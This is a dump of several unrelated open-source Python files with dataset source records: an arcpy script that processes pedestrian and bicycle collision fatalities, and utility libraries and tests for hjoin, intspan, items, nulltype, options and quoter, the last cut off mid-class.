arcpy.JoinField_management(staging_gdb + ped_f, "cnn_intrsctn_fkey", staging_gdb + ped_f_auto, "cnn_intrsctn_fkey", ["auto_move"])
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - field manipulations"+ "\n")
try:
print "Joining ped fatalities..."
file.write(str(time.ctime()) +": joined ped fatalities"+ "\n")
# Join codes to auto move
arcpy.JoinField_management(staging_gdb + ped_f, "auto_move", switrs_mvmt_codes, "Code", ["auto_desc"])
print "Success"
except:
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - join table"+ "\n")
# BIKE
try:
print "Filtering for bike fatalities..."
# Create shapefile: bike level, fatalities only
bike_f = "bikecollisions_party_bike_fatal"
arcpy.FeatureClassToFeatureClass_conversion (staging_gdb + bikecol_party, staging_gdb, bike_f, """ "party_type" = 'Bicyclist' AND "number_killed" <> 0 """)
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS bike fatalities - feature class to feature class conversion (bicyclist level dataset)"+ "\n")
try:
# Create shapefile: auto level, with only columns for join (collision ID and turning movement of car)
bike_f_auto = "ped_f_auto"
arcpy.FeatureClassToFeatureClass_conversion (staging_gdb + bikecol_party, staging_gdb, bike_f_auto, """ "party_type" = 'Driver (including Hit and Run)' """)
print "Success"
except:
file.write(str(time.ctime()) +": FAILED TO PROCESS bike fatalities - feature class to feature class conversion (auto level dataset)"+ "\n")
# Join auto movement to bike fatality table
try:
print "Processing bike fatalities..."
# rename first to avoid confusion
arcpy.AddField_management(staging_gdb + bike_f_auto, "auto_move", "TEXT", "", "", "100", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.CalculateField_management(staging_gdb + bike_f_auto, "auto_move", "!move_pre_acc!", "PYTHON_9.3", "")
arcpy.DeleteField_management(staging_gdb + bike_f_auto, "move_pre_acc")
arcpy.JoinField_management(staging_gdb + bike_f, "cnn_intrsctn_fkey", staging_gdb + bike_f_auto, "cnn_intrsctn_fkey", ["auto_move"])
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS bike fatalities - field manipulations"+ "\n")
try:
print "Joining bike fatalities..."
# Join codes to auto move
arcpy.JoinField_management(staging_gdb + bike_f, "auto_move", switrs_mvmt_codes, "Code", ["auto_desc"])
print "Success"
file.write(str(time.ctime()) +": joined bike fatalities"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO PROCESS bike fatalities - join table"+ "\n")
# function to create buffers
def arcpybuffer(buffer_name,original_name,buffer_dist,dissolve_opt,dissolve_fld):
print("\n")
print "Buffering " + buffer_name
#bufferlist.append(buffer_name)
staging_name = staging_gdb + original_name
filename_buffer = staging_gdb + buffer_name
arcpy.Buffer_analysis(staging_name, filename_buffer, buffer_dist, "", "", dissolve_opt, dissolve_fld)
print "finished buffer"
# buffer all
# 500 feet buffer, no dissolve
arcpybuffer("TB_pedcollisions_int_buffer",pedcol_2,"500 Feet","","")
arcpybuffer("TB_bikecollisions_int_buffer",bikecol_2,"500 Feet","","")
arcpybuffer("pedcollisions_party_ped_fatal_buffer",ped_f,"500 Feet","","")
arcpybuffer("bikecollisions_party_bike_fatal_buffer",bike_f,"500 Feet","","")
file.write(str(time.ctime()) +": ran buffers"+ "\n")
file.write(str(time.ctime()) +": FINISHED SUCCESSFULLY"+ "\n")
file.close()
print "FINISHED SUCCESSFULLY"
################################################################################################
except Exception,e:
print "Ended badly"
file.write(str(time.ctime()) +": Ended badly")
print str(e)
file.write(str(e))
file.close()
``` |
{
"source": "jonathaneunice/hjoin",
"score": 3
} |
#### File: hjoin/hjoin/core.py
```python
from ansiwrap import ansilen, ansi_terminate_lines
def string_shape(s):
"""
Return the height, width of a string, in lines/scharacters.
h,w order chosen to be compatible with rows, columns standard of
NumPy and and its shape method.
"""
lines = s.splitlines()
lengths = [ansilen(l) for l in lines]
return (len(lengths), max(lengths or [0]))
def ansi_ljust(s, width):
needs = width - ansilen(s)
if needs > 0:
return s + ' ' * needs
else:
return s
def hjoin(strings, sep=' '):
"""
Horizontal join. Concatenates strings horizontally. Like
join, but considers nth line of each string to be another column
and concatenates it appropriately.
"""
if not strings:
return ''
ncols = len(strings)
slines = [ansi_terminate_lines(s.splitlines()) for s in strings]
shapes = [string_shape(s) for s in strings]
heights, widths = zip(*shapes)
height = max(heights)
lines = []
for row_index in range(height):
row = []
for col_index in range(ncols):
col_lines = slines[col_index]
if row_index < heights[col_index]:
cell = col_lines[row_index]
else:
cell = ''
celljust = ansi_ljust(cell, widths[col_index])
row.append(celljust)
lines.append(sep.join(row))
return '\n'.join(lines)
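# --- Illustrative usage (not part of the original module) ---
# hjoin(['a\nb\nc', '1\n2']) lines up the two "columns" row by row:
#   a 1
#   b 2
#   c
# The shorter column is padded with spaces so later columns stay aligned.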
``` |
{
"source": "jonathaneunice/intspan",
"score": 3
} |
#### File: intspan/test/test_intspan.py
```python
import pytest
from intspan import *
from intspan import ParseError
def test_basic():
s = intspan()
tests = ['', '1', '1-2', '1-3,9-10', '1-3,14,29,92-97']
for t in tests:
s = intspan(t)
assert str(s) == t
def test_alt_contstructors():
assert intspan(range(100)) == intspan('0-99')
assert intspan([1,3,5]) == intspan('1,3,5')
assert intspan([5,3,1]) == intspan('1,3,5')
assert intspan(intspan('1,3,5')) == intspan('1,3,5')
def test_parse_error():
with pytest.raises(ParseError):
s = intspan('7*99')
with pytest.raises(ParseError):
s = intspan('-4,5-4')
with pytest.raises(ParseError):
s = intspan('1-4,5-')
def test_spaces():
assert list(intspan(' ')) == []
assert list(intspan(' 1')) == [1]
assert list(intspan('1, 4, 4 , 9')) == [1, 4, 9]
assert list(intspan('1, 4, 4 , 9')) == [1, 4, 9]
assert list(intspan('1, 4, 4 , 9')) == [1, 4, 9]
assert list(intspan(' 1, \n4,\n 4 , 9')) == [1, 4, 9]
def test_negatives():
assert list(intspan('-2')) == [-2]
assert list(intspan('-2-1')) == [-2, -1, 0, 1]
assert list(intspan('-2--1')) == [-2, -1]
def test_contains():
s = intspan()
assert 1 not in s
assert 100 not in s
assert 0 not in s
t = intspan('1,10')
assert 1 in t
assert 10 in t
assert 0 not in t
assert 2 not in t
def test_equals():
s = intspan('1,3,5,7,9')
assert s == set([1, 3, 5, 7, 9])
def test_strict_super_or_subset():
s = intspan('1,3,5,7,9')
t = intspan('1,3,5')
u = intspan('0,1,3,5')
assert s > t
assert not s > u
assert t < s
assert t < u
assert u > t
assert not s < u
assert not s > u
def test_isdisjoint():
s = intspan('1,3,5,7,9')
t = intspan('33-44')
u = intspan('1,3,99,299')
assert s.isdisjoint(t)
assert not s.isdisjoint(u)
assert t.isdisjoint(u)
def test_copy():
t = intspan('1,10')
tt = t.copy()
assert type(tt) == type(t)
assert t == tt
assert t is not tt
def test_clear():
s = intspan('1,2,3,5,8,13,21')
s.clear()
assert s == intspan()
def test_len():
s = intspan('1,2,3,5,8,13,21')
assert len(s) == 7
s.pop()
assert len(s) == 6
s.clear()
assert len(s) == 0
def test_merge():
assert str(intspan('1-4,5')) == '1-5'
def test_out_of_order():
assert str(intspan('1,0,99,4,7,9,98')) == '0-1,4,7,9,98-99'
def test_discard():
s = intspan('1-3,14,29,92-97')
s.discard('2,13,92')
assert str(s) == '1,3,14,29,93-97'
def test_remove():
s = intspan('1-3,14,29,92-97')
s.remove('2,92')
assert str(s) == '1,3,14,29,93-97'
with pytest.raises(KeyError):
s.remove(1000)
def test_add():
s = intspan('1-2')
s.add('3,29')
assert str(s) == '1-3,29'
s.add('92,97,96,95,94')
assert str(s) == '1-3,29,92,94-97'
s.add(93)
assert str(s) == '1-3,29,92-97'
s.add('14')
assert str(s) == '1-3,14,29,92-97'
def test_iteration():
s = intspan('92,97,96,95,0,94')
assert [item for item in s] == [0, 92, 94, 95, 96, 97]
assert list(s) == [0, 92, 94, 95, 96, 97]
assert set(s) == set([0, 92, 94, 95, 96, 97])
def test_issubset():
s = intspan('92,97,96,95,0,94')
assert s.issubset('0-100')
assert s.issubset(range(98))
assert s.issubset(range(101))
assert s.issubset('0, 92-100')
assert s.issubset([0] + list(range(92, 101)))
assert s.issubset(intspan('92,97,96,95,0,94'))
assert s.issubset([0, 92, 94, 95, 96, 97])
assert not s.issubset('0-10')
assert not s.issubset(range(20))
assert not s.issubset(range(95))
def test_issuperset():
s = intspan('0-3,7')
assert s.issuperset('0-2')
assert s.issuperset([0, 1, 3])
assert not s.issuperset(range(6))
assert not s.issuperset('0-6')
assert s >= intspan('0-2')
assert s >= intspan([0, 1, 3])
assert not s >= range(6)
assert not s >= intspan('0-6')
def test_union():
s = intspan('0-3,7')
assert s.union('0-2') == s
assert list(s.union('0-2')) == [0, 1, 2, 3, 7]
assert list(s.union([99, 101])) == [0, 1, 2, 3, 7, 99, 101]
assert s.union([99, 101]) == intspan('0-3,7,99,101')
assert s | intspan('0-2') == s.union('0-2')
assert s | [99, 101] == s.union('99,101')
def test_intersection():
s = intspan('1-8')
t = intspan('2-5')
u = intspan('8,100')
assert s.intersection(t) == intspan('2-5')
assert t.intersection(u) == intspan()
assert s.intersection(u) == intspan('8')
assert s & t == s.intersection(t)
assert t & u == t.intersection(u)
assert s & u == s.intersection(u)
def test_difference():
s = intspan('1-8')
t = intspan('2-5')
assert s.difference(t) == intspan('1,6-8')
assert t.difference(s) == intspan()
assert s - t == s.difference(t)
assert t - s == t.difference(s)
def test_symmetric_difference():
s = intspan('1-8')
t = intspan('2-5')
assert s.symmetric_difference(t) == intspan('1,6-8')
assert t.symmetric_difference(s) == intspan('1,6-8')
assert t.symmetric_difference(t) == intspan()
assert s ^ t == s.symmetric_difference(t)
assert t ^ s == t.symmetric_difference(s)
assert t ^ t == t.symmetric_difference(t)
def test_augmented_assignments():
s = intspan('50-60')
s |= intspan('10-20')
assert s == intspan('10-20,50-60')
s &= intspan('0-55')
assert s == intspan('10-20,50-55')
s -= intspan('16-20')
assert s == intspan('10-15,50-55')
s ^= intspan('10,99')
assert s == intspan('11-15,50-55,99')
t = intspan('50-60')
t.update('10-20')
assert t == intspan('10-20,50-60')
t.intersection_update('0-55')
assert t == intspan('10-20,50-55')
t.difference_update('16-20')
assert t == intspan('10-15,50-55')
t.symmetric_difference_update('10,99')
assert t == intspan('11-15,50-55,99')
def test_pop():
s = intspan('100-110')
assert s.pop() == 100
assert s.pop() == 101
assert s.pop() == 102
assert s.pop() == 103
assert s.pop() == 104
assert s.pop() == 105
assert s == intspan('106-110')
s = intspan('1-2')
assert s.pop() == 1
assert s.pop() == 2
with pytest.raises(KeyError):
s.pop()
def test_ranges():
assert intspan().ranges() == []
assert intspan('2').ranges() == [(2, 2)]
assert intspan('1-3').ranges() == [(1, 3)]
assert intspan('1-3,5-6').ranges() == [(1, 3), (5, 6)]
def test_from_range():
assert intspan.from_range(1, 3) == intspan('1-3')
assert intspan.from_range(2, 44) == intspan('2-44')
def test_from_ranges():
assert intspan.from_ranges([(1, 3), (5, 6)]) == intspan('1-3,5-6')
assert intspan.from_ranges([(1, 3)]) == intspan('1-3')
assert intspan.from_ranges([(2, 2)]) == intspan('2')
assert intspan.from_ranges([]) == intspan()
def test_universe():
assert intspan().universe() == intspan()
assert intspan('').universe() == intspan()
assert intspan([]).universe() == intspan()
assert intspan('1').universe() == intspan('1')
assert intspan('1,3,5,7').universe() == intspan('1-7')
s = intspan('1,3,5-9')
assert s.universe() == intspan('1-9')
assert s.universe(high=10) == intspan('1-10')
assert s.universe(high=14) == intspan('1-14')
assert s.universe(low=0) == intspan('0-9')
assert s.universe(low=0, high=14) == intspan('0-14')
assert s.universe(-2, 5) == intspan('-2-5')
assert intspan('1-100').universe() == intspan('1-100')
def test_complement():
s = intspan('1,3,5-9')
assert s.complement() == intspan('2,4')
assert s.complement(high=10) == intspan('2,4,10')
assert s.complement(high=14) == intspan('2,4,10-14')
assert s.complement(low=0) == intspan('0,2,4')
assert s.complement(low=0, high=14) == intspan('0,2,4,10-14')
assert s.complement(-2, 5) == intspan('-2,-1,0,2,4')
items = intspan('1-3,5,7-9,10,21-24')
assert items.complement() == intspan('4,6,11-20')
assert items.complement(high=30) == intspan('4,6,11-20,25-30')
with pytest.raises(ValueError):
intspan().complement()
# cannot get the complement of an empty set
def test_repr_and_str():
s = intspan('10-20,50-55')
s.add(9)
s.discard('15-40')
assert str(s) == '9-14,50-55'
assert repr(s) == "intspan('" + str(s) + "')"
``` |
{
"source": "jonathaneunice/items",
"score": 3
} |
#### File: items/test/test.py
```python
from collections import OrderedDict, namedtuple
import json
import os
import sys
import pytest
from items import *
_PY2 = sys.version_info < (3, 0)
_PY36 = sys.version_info >= (3, 6)
def test_empty():
it = Item()
assert list(it.keys()) == []
assert list(it.values()) == []
assert list(it.items()) == []
assert isinstance(it, dict)
assert isinstance(it, OrderedDict)
def test_simple():
it = Item(a=1, c=22, b=99, r=4.4, d='this')
keys = 'a c b r d'.split()
values = [1, 22, 99, 4.4, 'this']
if _PY36:
assert list(it.keys()) == keys
else:
assert set(it.keys()) == set(keys)
if _PY36:
assert list(it.values()) == values
else:
assert set(it.values()) == set(values)
assert isinstance(it, dict)
assert isinstance(it, OrderedDict)
def test_from_dict():
d = {'this': 99, 'that': 'friends'}
it = Item(d)
assert it.this == d['this']
assert it['this'] == d['this']
assert it.that == d['that']
assert it['that'] == d['that']
def test_missing():
it = Item(a=1, b=2)
assert it.c is Empty
assert it['c'] is Empty
def test_repr():
it = Item(a=1, b=2, c='something')
if _PY36:
assert repr(it) == "Item(a=1, b=2, c='something')"
else:
r = repr(it)
assert r.startswith('Item(')
assert r.endswith(')')
assert 'a=1' in r
assert 'b=2' in r
assert "c='something'" in r
def test_Empty():
e = Empty
assert e.more.f.d is Empty
assert e[1].method().there[33][0].no.attributes[99].here is Empty
assert list(Empty) == []
for x in Empty:
assert False # should/must never execute
def test_from_tuples():
it = Item([('name', 'Susie'),
('age', 12),
('hobby', 'science'),
('friends', ['Dell', 'Bill'])])
assert it.name == 'Susie'
assert it.age == 12
assert it.hobby == 'science'
assert it.friends == ['Dell', 'Bill']
assert len(it) == 4
with pytest.raises(ValueError):
it2 = Item([('name', 'Susie'),
('age', 12, 33), # unbalanced
('hobby', 'science'),
('friends', ['Dell', 'Bill'])])
Item(it2)
def test_attr_assign():
it = Item()
it.a = 12
it.b = 44
assert it.a == 12
assert it.b == 44
assert it['a'] == 12
assert it['b'] == 44
assert list(it.keys()) == ['a', 'b']
assert list(it.values()) == [12, 44]
def test_attr_del():
it = Item(a=12, b=44)
del it.b
assert it.a == 12
assert it.b == Empty
assert len(it) == 1
del it.a
assert it.a == Empty
assert len(it) == 0
del it.a
assert len(it) == 0
def test_named_tuple():
NT = namedtuple('NT', 'a b c')
n = NT(1, 2, 3)
assert n.a == 1
assert n.b == 2
assert n.c == 3
ni = Item(n)
assert ni.a == 1
assert ni.b == 2
assert ni.c == 3
assert set(ni.keys()) == set(['a', 'b', 'c'])
# this verbose test statement due to Python 3.5 not having static dict
# item ordering
d = { 'first': 1, 'n': n}
di = Item(d)
print(di)
assert di.first == 1
assert di.n.a == 1
assert di.n.b == 2
assert di.n.c == 3
di.two = 'two'
di.n.a = 100
di.n.d = 'ddd'
assert di.first == 1
assert di.two == 'two'
assert di.n.a == 100
assert di.n.b == 2
assert di.n.c == 3
assert di.n.d == 'ddd'
assert set(di.keys()) == set(['first', 'n', 'two'])
assert set(di.n.keys()) == set('abcd')
def test_itemize():
things = [ {'a': 1}, {'a': 7} ]
for t in itemize(things):
assert isinstance(t, Item)
assert t.a == 1 or t.a == 7
def test_itemize_non_dict():
assert itemize_all([4, 3], 'a') == [Item(a=4), Item(a=3)]
assert itemize_all([(1, 2), (4, 5)], 'a b') == [Item(a=1, b=2), Item(a=4, b=5)]
# skipping some tail members doesn't cause problems
assert itemize_all([(1, 2, 3), (4, 5, 6), (7, 8, 9)], 'a b c') == \
[Item(a=1, b=2, c=3), Item(a=4, b=5, c=6), Item(a=7, b=8, c=9)]
assert itemize_all([(1, 2, 3), (4, 5), (7, 8, 9)], 'a b c') == \
[Item(a=1, b=2, c=3), Item(a=4, b=5), Item(a=7, b=8, c=9)]
assert itemize_all([(1, 2, 3), (4, ), (7, 8, 9)], 'a b c') == \
[Item(a=1, b=2, c=3), Item(a=4), Item(a=7, b=8, c=9)]
assert itemize_all([(1, 2, 3), 4, (7, 8, 9)], 'a b c') == \
[Item(a=1, b=2, c=3), Item(a=4), Item(a=7, b=8, c=9)]
def test_itemize_all():
things = [ {'a': 1}, {'a': 7} ]
t_all = itemize_all(things)
assert isinstance(t_all, list)
assert len(t_all) == 2
assert t_all[0].a == 1
assert t_all[1].a == 7
assert t_all[1].other is Empty
def test_composite_1():
"""
Read a JSON file, and ensure it has the same structure as Items as it
does in a native, non-attribute-accessible structure using OrderedDict
"""
datadir, _ = os.path.split(__file__)
datapath = os.path.join(datadir, 'testdata', 'data1.json')
with open(datapath) as f:
rawjson = f.read()
data_i = json.loads(rawjson, object_pairs_hook=Item)
data_o = json.loads(rawjson, object_pairs_hook=OrderedDict)
for x, y in zip(data_i, data_o):
assert list(x.keys()) == list(y.keys())
assert list(x.values()) == list(y.values())
``` |
{
"source": "jonathaneunice/nulltype",
"score": 3
} |
#### File: nulltype/test/test_nonnulltype.py
```python
from nulltype import NonNullType
Extant = NonNullType("Extant")
Something = NonNullType("Something")
Flubber = NonNullType("Flubber")
nonnulls = [Extant, Something, Flubber]
def test_doc_example():
Full = NonNullType('Full')
assert bool(Full) is True
assert len(Full) == 1
assert list(Full) == [Full]
assert Full.some_attribute is Full
assert Full[22] is Full
assert Full("hey", 12) is Full
def test_bool():
for n in nonnulls:
assert bool(n)
def test_if():
for n in nonnulls:
if not n:
assert False
def test_getitem():
assert Something[33] is Something
assert Something["yo"] is Something
def test_setitem():
Flubber[33] = 1.134
assert Flubber[33] is Flubber
def test_getattr():
for nonnull in nonnulls:
assert nonnull.attribute is nonnull
assert nonnull.other is nonnull
assert nonnull.attribute.other.another is nonnull
assert nonnull.other.attribute.another is nonnull
assert nonnull.another.attribute.other is nonnull
def test_getattr_getitem():
assert Something[12].something[33].lazy is Something
SwedishChef = NonNullType('SwedishChef')
alt = SwedishChef
assert alt.swedish.chef.bork.bork.bork is SwedishChef
# tip of the hat to the Usenet of yore
def test_setattr():
for nonnull in nonnulls:
attrs = getattr(nonnull, '__dict__')
nonnull.one = 44
nonnull.this.that.the_other = 444
assert getattr(nonnull, '__dict__') == attrs
# i.e., after attribute changes, assert that none have changed
def test_iteration():
for nonnull in nonnulls:
assert len(nonnull) == 1
assert list(nonnull) == [nonnull]
for n in nonnull:
assert n is nonnull
def test_call():
for nonnull in nonnulls:
assert nonnull() is nonnull
# now gild the lily
assert nonnull()["something"] is nonnull
assert nonnull().something is nonnull
def test_repr():
names = ["Extant", "Something", "Flubber"]
for nonnull, name in zip(nonnulls, names):
assert repr(nonnull) == name
def test_set_name():
Bozo = NonNullType("Bozo")
assert str(Bozo) == "Bozo"
Bozo.__name = "Bozo the Clown"
assert str(Bozo) == "Bozo"
# No name changes!
``` |
{
"source": "jonathaneunice/options",
"score": 3
} |
#### File: options/options/callattr.py
```python
import sys
_PY2 = sys.version_info[0] == 2
if _PY2:
class _ALFKJSLJD(object):
def m(self): pass
meth_type = type(_ALFKJSLJD.m)
def callable_func(target):
if _PY2 and isinstance(target, meth_type):
return target.__func__
return target
def callable_setattr(target, name, value):
setattr(callable_func(target), name, value)
def callable_getattr(target, name):
try:
return getattr(callable_func(target), name)
except AttributeError:
return None
def callable_hasattr(target, name):
return hasattr(callable_func(target), name)
```
#### File: options/options/chainstuf.py
```python
from chainmap import ChainMap
class chainstuf(ChainMap):
"""
A stuf-like surfacing of the ChainMap collection (multi-layer dict)
introduced in Python 3. Uses a workalike replacement to make it suitable
for Python 2.6, Python 3.2, and PyPy3.
"""
def __init__(self, *maps):
ChainMap.__init__(self, *maps)
def __getattr__(self, key):
for m in self.maps:
try:
return m[key]
except KeyError:
pass
raise KeyError(key)
def __setattr__(self, key, value):
if key == 'maps' or key in self.__dict__:
ChainMap.__setattr__(self, key, value)
else:
self.maps[0][key] = value
```
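A brief, hedged usage sketch of `chainstuf` may help before the tests that follow; it assumes the module path shown above (`options.chainstuf`) and only illustrates layering and attribute access.
```python
# Hedged illustration, not part of the original repository.
from options.chainstuf import chainstuf

defaults = dict(color='blue', size=10)
overrides = dict(size=12)
cfg = chainstuf(overrides, defaults)
assert cfg.size == 12        # resolved from the top (first) map
assert cfg.color == 'blue'   # falls through to the lower map
cfg.shape = 'round'          # attribute writes land in the top map
assert overrides['shape'] == 'round'
```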
#### File: options/test/test_chainstuf.py
```python
from options.chainstuf import chainstuf
import sys
import pytest
def test_one():
base = dict(a=1, b=2)
top = dict(a=5)
chain = chainstuf(top, base)
assert chain['a'] == 5
assert chain.a == 5
assert chain['b'] == 2
assert chain.b == 2
with pytest.raises(KeyError):
chain['c']
with pytest.raises(KeyError):
chain.c
assert chain.__getattr__ is not None
def test_chainstuf():
"""Test chainstuf class"""
# make some base dicts
d1 = dict(this=1, that=2)
d2 = dict(roger=99, that=100)
# test simple attribute equivalence
dd = chainstuf(d1, d2)
assert dd.this == 1
assert dd.roger == 99
assert dd.this == dd['this']
assert dd.that == dd['that']
assert dd.roger == dd['roger']
# set value on chainstuf, ensure properly set, in top dict
dd.roger = 'wilco'
assert dd.roger == 'wilco'
assert dd.roger == d1['roger']
# test new_child
dd2 = dd.new_child()
dd2.smorg = 44
assert dd2.smorg == 44
dd.roger = 'roger'
assert dd2.roger == 'roger'
with pytest.raises(KeyError):
dd.nork
def test_files():
# stuf (<0.9.9) had a problem with files being assigned in a stuf()
# constructor. It was fixed in 0.9.10, though not for PyPy. This test
# demonstrates that otherstuf.chainstuf does not manifest this bug. To be
# fair, the bug was in stuf's base collections (stuf and orderedstuf), not
# stuf.chainstuf. So this test is included out of an abundance of caution.
# Get names of files that won't be munged by py.test's capturing mechanism
# (sys.stdout and sys.stderr definitely will be overtaken by py.test, but
# their primitive double-underscore names won't be). This doesn't seem to
# be an issue with Python 2.x, but spuriously screws up the test otherwise
# in Python 3.x (gives false negative, saying module not working when it is)
f1 = sys.__stdout__
f2 = sys.__stderr__
f3 = sys.__stdin__
d1 = dict(a=44, b=f2, c=[f2, f3])
d2 = dict(a=f1)
o = chainstuf(d2, d1)
assert o.a is f1
assert o.b is f2
assert len(o.c) == 2
assert o.c[0] is f2
assert o.c[1] is f3
# first push
oo = o.new_child()
oo.b = f1
oo.c = 12
assert oo.a is f1
assert oo.b is f1
assert oo.c == 12
# now try it with an update
d3 = dict(b=f1, c=12)
oo2 = oo.new_child()
oo2.update(d3)
assert oo2.a is f1
assert oo2.b is f1
assert oo2.c == 12
# second push
ooo = oo.new_child()
ooo.update(dict(a=f2, b=f3))
assert ooo.a is f2
assert ooo.b is f3
assert ooo.c == 12
``` |
{
"source": "jonathaneunice/quoter",
"score": 4
} |
#### File: quoter/quoter/joiner.py
```python
import re
from options import Options
from .util import *
from .quoter import Quoter
from .styleset import *
import six
class Joiner(Quoter):
"""
A type of Quoter that deals with sequences.
"""
options = Quoter.options.add(
sep=', ', # separator between items
twosep=None, # separator between items if only two
lastsep=None, # separator between penultimate and final item
quoter=None, # quoter for individual items
endcaps=None, # quoter for entire joined sequence
)
def __init__(self, **kwargs):
"""
Create a Joiner
"""
Quoter.__init__(self)
opts = self.options = self.__class__.options.push(kwargs)
def __call__(self, seq, **kwargs):
"""
Join the items of a sequence into a string. Implicitly stringifies any
non-string values. Allows specification of the separator between items (and
a special case for the last separator). Allows each item to be optionally
quoted by a function, and the entire list to be optionally quoted with an
endcaps function. A separate suffix and prefix may also be provided.
"""
opts = self.options.push(kwargs)
def prep(v):
"""
Prepare an item by stringifying and optionally quoting it.
"""
s = stringify(v)
return opts.quoter(s) if opts.quoter else s
seqlist = list(seq)
length = len(seqlist)
if length == 0:
core = ''
elif length == 1:
core = prep(seqlist[0])
elif length == 2 and opts.twosep:
sep = opts.twosep if opts.twosep is not None else opts.sep
core = sep.join(prep(v) for v in seqlist)
else:
start = [ prep(v) for v in seqlist[:-1] ]
final = prep(seqlist[-1])
if opts.lastsep is None:
opts.lastsep = opts.sep
core = opts.lastsep.join([ opts.sep.join(start), final])
pstr, mstr = self._whitespace(opts)
capped = opts.endcaps(core) if opts.endcaps else core
payload = [mstr, blanknone(opts.prefix), pstr, capped, pstr,
blanknone(opts.suffix), mstr]
return self._output(payload, opts)
# TODO: Determine if it makes any sense for Joiners to take *args
join = StyleSet(
factory = Joiner,
instant = False,
immediate = Joiner(),
promote = 'but clone')
# specializations
# A and B. A, B, and C.
and_join = join.and_join = join.but(sep=', ', twosep=' and ', lastsep=', and ')
# A or B. A, B, or C.
or_join = join.or_join = join.but(sep=', ', twosep=' or ', lastsep=', or ')
joinlines = join.joinlines = join.lines = join.but(sep="\n", suffix="\n")
concat = join.concat = join.but(sep='', twosep='', lastsep='')
# TODO: Rationalize with respect to more sophisticated quoter args
# TODO: Add padding and margin, like quoter
items_options = Options(
sep="\n", # separator between items
fmt="{key}: {value!r}",
header=None, # header for entire list
footer=None # footer for entire list
)
def iter_items(items):
if hasattr(items, 'items'): # dict or mapping
for k, v in items.items():
yield k, v
else:
for k, v in enumerate(items):
yield k, v
def items(seq, **kwargs):
opts = items_options.push(kwargs)
formatted_items = [ opts.fmt.format(key=k, value=v) for k,v in iter_items(seq) ]
items_str = opts.sep.join(formatted_items)
if opts.header or opts.footer:
parts = []
if opts.header:
parts.extend([opts.header, opts.sep])
parts.append(items_str)
if opts.footer:
parts.extend([opts.sep, opts.footer])
items_str = ''.join(parts)
return items_str
# TODO: needs to be moved into object structure, like quoter
```
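The joiners above are easiest to understand from a few calls. The sketch below is illustrative only, assuming the package installs with the module path shown (`quoter.joiner`); the expected strings follow from the `sep`/`twosep`/`lastsep` options each specialization sets.
```python
# Hedged usage sketch, not part of the original repository.
from quoter.joiner import and_join, or_join, concat, items

assert and_join(['a', 'b']) == 'a and b'
assert and_join(['a', 'b', 'c']) == 'a, b, and c'
assert or_join(['x', 'y', 'z']) == 'x, y, or z'
assert concat(['1', '2', '3']) == '123'
assert items({'x': 1}) == 'x: 1'     # default fmt is '{key}: {value!r}'
```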
#### File: quoter/quoter/markdown.py
```python
import re
import six
from options import Options, OptionsClass, Prohibited, Transient
from .util import *
from .quoter import Quoter
from .joiner import joinlines
from .styleset import StyleSet
# MD_ATTRS = set(['a', 'p', 'doc', 'h'])
# MD_ATTRS.update(QUOTER_ATTRS)
class MDQuoter(Quoter):
"""
A more sophisticated quoter for Markdown elements.
"""
options = Quoter.options.add(
misc = Prohibited,
)
def __init__(self, *args, **kwargs):
"""
Create an MDQuoter
"""
# Restating basic init to avoid errors of self.__getattribute__
# that can flummox superclass instantiation
super(Quoter, self).__init__()
opts = self.options = self.__class__.options.push(kwargs)
def a(self, text, href, **kwargs):
opts = self.options.push(kwargs)
parts = ["[", text, "](", href, ")"]
return self._output(parts, opts)
def p(self, *args, **kwargs):
opts = self.options.push(kwargs)
return self._output(args, opts)
def doc(self, seq, **kwargs):
opts = self.options.push(kwargs)
return joinlines(seq, sep="\n\n")
# FIXME: kwargs not really used
def h(self, text, level=1, close=False, setext=False, **kwargs):
"""
Headers at various levels. Either ATX style (hashmark prefix)
by default, or Setext (underlining) style optionally.
"""
opts = self.options.push(kwargs)
if setext:
char = '=' if level == 1 else '-'
parts = [text, '\n', char * len(text), '\n']
else:
prefix = "#" * level
parts = [prefix, ' ', text]
if close:
parts.extend([' ', prefix])
return self._output(parts, opts)
def h1(self, text, **kwargs):
kwargs['level'] = 1
return self.h(text, **kwargs)
def h2(self, text, **kwargs):
kwargs['level'] = 2
return self.h(text, **kwargs)
def h3(self, text, **kwargs):
kwargs['level'] = 3
return self.h(text, **kwargs)
def h4(self, text, **kwargs):
kwargs['level'] = 4
return self.h(text, **kwargs)
def h5(self, text, **kwargs):
kwargs['level'] = 5
return self.h(text, **kwargs)
def h6(self, text, **kwargs):
kwargs['level'] = 6
return self.h(text, **kwargs)
def hr(self, **kwargs):
opts = self.options.push(kwargs)
return self._output(['-' * 5], opts)
# see http://daringfireball.net/projects/markdown/syntax
# for basic syntax
# TODO: blockquote
# TODO: code
# TODO: list (ordered)
# TODO: list (unordered)
# TODO: image
# TODO: automatic link
# TODO: footnote
# TODO: table
# TODO: literal asterisks
# TODO: get vsep working
# need this because basic joiners don't do varargs yet
md = StyleSet(
factory = MDQuoter,
immediate = MDQuoter(),
instant = False,
promote = 'but clone p a doc h')
md.i = MDQuoter(prefix="*", suffix="*")
md.b = MDQuoter(prefix="**", suffix="**")
# _md_doc = joinlines.but(sep="\n\n")
# MDQuoter.styles['doc'] = _md_doc
# object.__setattr__(MDQuoter, 'doc') == _md_doc
# some obvious glitches and complexities in __getargument__ setup still,
# given complexity of defining doc method - look into
```
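A few illustrative calls may make `MDQuoter` concrete. This is a hedged sketch, not from the repository; it uses the module path shown above and instantiates `MDQuoter` directly for the method-style helpers rather than relying on the `StyleSet` promotion.
```python
# Hedged usage sketch; md.i / md.b are the styles attached above.
from quoter.markdown import md, MDQuoter

mq = MDQuoter()
assert md.i('emphasis') == '*emphasis*'
assert md.b('strong') == '**strong**'
assert mq.h('Title', level=2) == '## Title'
assert mq.a('link text', 'http://example.com') == '[link text](http://example.com)'
```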
#### File: quoter/quoter/quoter.py
```python
import re
import six
from options import Options, OptionsClass, Prohibited, Transient
from .base import QuoterBase
from .util import *
from .styleset import StyleSet
class BadStyleName(ValueError):
pass
class Quoter(OptionsClass, QuoterBase):
"""
A quote style. Instantiate it with the style information. Call
it with a value to quote the value.
"""
options = Options(
prefix = None,
suffix = None,
pair = Transient,
sep = '',
margin = 0,
padding = 0,
encoding = None,
)
